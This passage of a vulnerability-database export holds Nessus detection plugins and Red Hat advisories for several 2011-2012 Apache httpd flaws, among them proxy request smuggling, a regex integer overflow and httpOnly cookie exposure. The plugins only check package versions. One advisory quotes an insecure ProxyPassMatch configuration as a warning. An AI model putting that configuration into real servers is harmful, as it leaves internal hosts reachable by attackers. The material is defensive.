\n value:\n\"Several vulnerabilities have been found in the Apache HTTPD Server :\n\n - CVE-2011-3607 :\n An integer overflow in ap_pregsub() could allow local\n attackers to execute arbitrary code at elevated\n privileges via crafted .htaccess files.\n\n - CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 :\n The Apache HTTP Server did not properly validate the\n request URI for proxied requests. 
In certain reverse\n proxy configurations using the ProxyPassMatch directive\n or using the RewriteRule directive with the [P] flag, a\n remote attacker could make the proxy connect to an\n arbitrary server. This could allow the attacker to\n access internal servers that are not otherwise\n accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same\n issue.\n\n Note that, even with this issue fixed, it is the responsibility of\n the administrator to ensure that the regular expression replacement\n pattern for the target URI does not allow a client to append\n arbitrary strings to the host or port parts of the target URI. For\n example, the configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following\n configurations :\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1 ProxyPassMatch\n ^/mail/(.*) http://internal-host/$1\n\n - CVE-2012-0031 :\n An apache2 child process could cause the parent process\n to crash during shutdown. This is a violation of the\n privilege separation between the apache2 processes and\n could potentially be used to worsen the impact of other\n vulnerabilities.\n\n - CVE-2012-0053 :\n The response message for error code 400 (bad request)\n could be used to expose 'httpOnly' cookies. 
This could\n allow a remote attacker using cross site scripting to\n steal authentication cookies.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2405\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache2 packages.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version apache2 2.2.16-6+squeeze6\n\nThis update also contains updated apache2-mpm-itk packages which have\nbeen recompiled against the updated apache2 packages. The new version\nnumber for the oldstable distribution is 2.2.6-02-1+lenny7. 
In the\nstable distribution, apache2-mpm-itk has the same version number as\napache2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"apache2\", reference:\"2.2.9-10+lenny12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-dbg\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-doc\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-event\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-itk\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-prefork\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-worker\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-prefork-dev\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-suexec\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-suexec-custom\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-threaded-dev\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-utils\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2.2-bin\", reference:\"2.2.16-6+squeeze6\")) 
flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2.2-common\", reference:\"2.2.16-6+squeeze6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:13:11", "bulletinFamily": "scanner", "description": "It was discovered that the Apache HTTP Server incorrectly handled the\nSetEnvIf .htaccess file directive. An attacker having write access to\na .htaccess file may exploit this to possibly execute arbitrary code.\n(CVE-2011-3607)\n\nPrutha Parikh discovered that the mod_proxy module did not properly\ninteract with the RewriteRule and ProxyPassMatch pattern matches in\nthe configuration of a reverse proxy. This could allow remote\nattackers to contact internal webservers behind the proxy that were\nnot intended for external exposure. (CVE-2011-4317)\n\nRainer Canavan discovered that the mod_log_config module incorrectly\nhandled a certain format string when used with a threaded MPM. A\nremote attacker could exploit this to cause a denial of service via a\nspecially crafted cookie. This issue only affected Ubuntu 11.04 and\n11.10. (CVE-2012-0021)\n\nIt was discovered that the Apache HTTP Server incorrectly handled\ncertain type fields within a scoreboard shared memory segment. A local\nattacker could exploit this to cause a denial of service.\n(CVE-2012-0031)\n\nNorman Hippert discovered that the Apache HTTP Server incorrectly\nhandled header information when returning a Bad Request (400) error\npage. A remote attacker could exploit this to obtain the values of\ncertain HTTPOnly cookies. (CVE-2012-0053).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-12-01T00:00:00", "published": "2012-02-17T00:00:00", "id": "UBUNTU_USN-1368-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57999", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : apache2 vulnerabilities (USN-1368-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1368-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57999);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/12/01 13:19:06\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 50802, 51407, 51705, 51706);\n script_xref(name:\"USN\", value:\"1368-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : apache2 vulnerabilities (USN-1368-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Apache HTTP Server incorrectly handled the\nSetEnvIf .htaccess file directive. An attacker having write access to\na .htaccess file may exploit this to possibly execute arbitrary code.\n(CVE-2011-3607)\n\nPrutha Parikh discovered that the mod_proxy module did not properly\ninteract with the RewriteRule and ProxyPassMatch pattern matches in\nthe configuration of a reverse proxy. 
This could allow remote\nattackers to contact internal webservers behind the proxy that were\nnot intended for external exposure. (CVE-2011-4317)\n\nRainer Canavan discovered that the mod_log_config module incorrectly\nhandled a certain format string when used with a threaded MPM. A\nremote attacker could exploit this to cause a denial of service via a\nspecially-crafted cookie. This issue only affected Ubuntu 11.04 and\n11.10. (CVE-2012-0021)\n\nIt was discovered that the Apache HTTP Server incorrectly handled\ncertain type fields within a scoreboard shared memory segment. A local\nattacker could exploit this to cause a denial of service.\n(CVE-2012-0031)\n\nNorman Hippert discovered that the Apache HTTP Server incorrectly\nhandled header information when returning a Bad Request (400) error\npage. A remote attacker could exploit this to obtain the values of\ncertain HTTPOnly cookies. (CVE-2012-0053)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1368-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2.2-common package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2.2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"apache2.2-common\", pkgver:\"2.2.8-1ubuntu0.23\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"apache2.2-common\", pkgver:\"2.2.14-5ubuntu8.8\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"apache2.2-common\", pkgver:\"2.2.16-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"apache2.2-common\", pkgver:\"2.2.17-1ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"apache2.2-common\", pkgver:\"2.2.20-1ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2.2-common\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:18:34", "bulletinFamily": "scanner", "description": "- httpd-2.2.x-bnc743743-CVE-2012-0053-server_protocol_c-cookie_exposure.diff\naddresses CVE-2012-0053: error responses can expose cookies when\nno custom 400 error code ErrorDocument is configured. 
[bnc#743743]\n\n- httpd-2.2.x-bnc741243-CVE-2012-0031-scoreboard_handling.diff:\nscoreboard corruption\n (shared mem segment) by child causes\ncrash of privileged parent (invalid free()) during shutdown.\nThis is rated low impact. Notice:\nhttps://svn.apache.org/viewvc?view=revision&revision=1230065\nmakes a change to the struct global_score, which causes binary\nincompatibility. The change in above patch only goes as far as\nthe binary compatibility allows; the vulnerability is completely\nfixed, though. CVE-2012-0031 [bnc#741243]\n\n - /etc/init.d/apache2: new argument 'check-reload'. Exits\n 1 if httpd2 runs on deleted binaries such as after\n package update, else 0. This is used by equally modified\n /etc/logrotate.d/apache2, which uses\n '/etc/init.d/apache2 check-reload' in its prerotate\n script. These changes prevent httpd2 from being\n (gracefully) reloaded by logrotate, executed by cron, if\n new binaries have been installed. Instead, a warning is\n printed on stdout and is being logged to the syslogs. If\n this happens, apache's logs are NOT rotated, and the\n running processes are left untouched. This limits the\n maximum damage of log rotation to unrotated logs.\n '/etc/init.d/apache2 restart' (or 'rcapache2 restart')\n must be executed manually in such a case. [bnc#728876]\n\n- httpd-2.2.x-bnc729181-CVE-2011-3607-int_overflow.diff: Fix for\ninteger overflow in server/util.c also known as CVE-2011-3607.\n[bnc#729181]\n\n - enable build and configuration of mod_reqtimeout.c\n module by default in /etc/sysconfig/apache2\n (APACHE_MODULES=...). This does not change already\n existing sysconfig files, the module is only activated\n via sysconfig if this package is installed without\n pre-existing sysconfig file. See new file\n /etc/apache2/mod_reqtimeout.conf for configurables.\n Helps against Slowloris.pl DoS vulnerability that\n consists of eating up request slots by very slowly\n submitting the request. 
Note that mod_reqtimeout limits\n requests based on a lower boundary of request speed, not\n an upper boundary! CVE-2007-6750 [bnc#738855].", "modified": "2016-05-16T00:00:00", "published": "2014-06-13T00:00:00", "id": "OPENSUSE-2012-132.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74555", "title": "openSUSE Security Update : apache2 (openSUSE-2012-132)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-132.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74555);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2016/05/16 16:21:30 $\");\n\n script_cve_id(\"CVE-2007-6750\", \"CVE-2011-3607\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-2012-132)\");\n script_summary(english:\"Check for the openSUSE-2012-132 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"- httpd-2.2.x-bnc743743-CVE-2012-0053-server_protocol_c-cookie_exposure.diff\naddresses CVE-2012-0053: error responses can expose cookies when\nno custom 400 error code ErrorDocument is configured. [bnc#743743]\n\n- httpd-2.2.x-bnc741243-CVE-2012-0031-scoreboard_handling.diff:\nscoreboard corruption\n (shared mem segment) by child causes\ncrash of privileged parent (invalid free()) during shutdown.\nThis is rated low impact. Notice:\nhttps://svn.apache.org/viewvc?view=revision&revision=1230065\nmakes a change to the struct global_score, which causes binary\nincompatibility. The change in above patch only goes as far as\nthe binary compatibility allows; the vulnerability is completely\nfixed, though. 
CVE-2012-0031 [bnc#741243]\n\n - /etc/init.d/apache2: new argument 'check-reload'. Exits\n 1 if httpd2 runs on deleted binaries such as after\n package update, else 0. This is used by equally modified\n /etc/logrotate.d/apache2, which uses\n '/etc/init.d/apache2 check-reload' in its prerotate\n script. These changes prevent httpd2 from being\n (gracefully) reloaded by logrotate, executed by cron, if\n new binaries have been installed. Instead, a warning is\n printed on stdout and is being logged to the syslogs. If\n this happens, apache's logs are NOT rotated, and the\n running processes are left untouched. This limits the\n maximum damage of log rotation to unrotated logs.\n '/etc/init.d/apache2 restart' (or 'rcapache2 restart')\n must be executed manually in such a case. [bnc#728876]\n\n- httpd-2.2.x-bnc729181-CVE-2011-3607-int_overflow.diff: Fix for\ninteger overflow in server/util.c also known as CVE-2011-3607.\n[bnc#729181]\n\n - enable build and configuration of mod_reqtimeout.c\n module by default in /etc/sysconfig/apache2\n (APACHE_MODULES=...). This does not change already\n existing sysconfig files, the module is only activated\n via sysconfig if this package is installed without\n pre-existing sysconfig file. See new file\n /etc/apache2/mod_reqtimeout.conf for configurables.\n Helps against Slowloris.pl DoS vulnerability that\n consists of eating up request slots by very slowly\n submitting the request. Note that mod_reqtimeout limits\n requests based on a lower boundary of request speed, not\n an upper boundary! 
CVE-2007-6750 [bnc#738855].\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=728876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=729181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=738855\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=741243\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=743743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://svn.apache.org/viewvc?view=revision&revision=1230065\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-debuginfo-2.2.21-3.6.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.1\", reference:\"apache2-debugsource-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-devel-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-event-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-event-debuginfo-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-example-pages-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-itk-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-itk-debuginfo-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-prefork-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-prefork-debuginfo-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-utils-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-utils-debuginfo-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-worker-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-worker-debuginfo-2.2.21-3.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:42:28", "bulletinFamily": "unix", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. 
An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request.\n(CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. 
After installing the updated\npackages, the httpd daemon will be restarted automatically.\n", "modified": "2017-09-08T12:08:34", "published": "2012-02-21T05:00:00", "id": "RHSA-2012:0323", "href": "https://access.redhat.com/errata/RHSA-2012:0323", "type": "redhat", "title": "(RHSA-2012:0323) Moderate: httpd security update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T19:42:09", "bulletinFamily": "unix", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request,\nor by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. 
(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon will be restarted automatically.\n", "modified": "2018-06-06T20:24:35", "published": "2012-02-13T05:00:00", "id": "RHSA-2012:0128", "href": "https://access.redhat.com/errata/RHSA-2012:0128", "type": "redhat", "title": "(RHSA-2012:0128) Moderate: httpd security update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T19:42:43", "bulletinFamily": "unix", "description": "The Apache HTTP Server (\"httpd\") is the namesake project of The Apache\nSoftware Foundation.\n\nIt was discovered that the Apache HTTP Server did not properly validate the\nrequest URI for proxied requests. In certain configurations, if a reverse\nproxy used the ProxyPassMatch directive, or if it used the RewriteRule\ndirective with the proxy flag, a remote attacker could make the proxy\nconnect to an arbitrary server, possibly disclosing sensitive information\nfrom internal web servers not directly accessible to the attacker.\n(CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an \"Internal\nServer Error\" response when processing certain malformed HTTP requests,\nwhich caused the back-end server to be marked as failed in 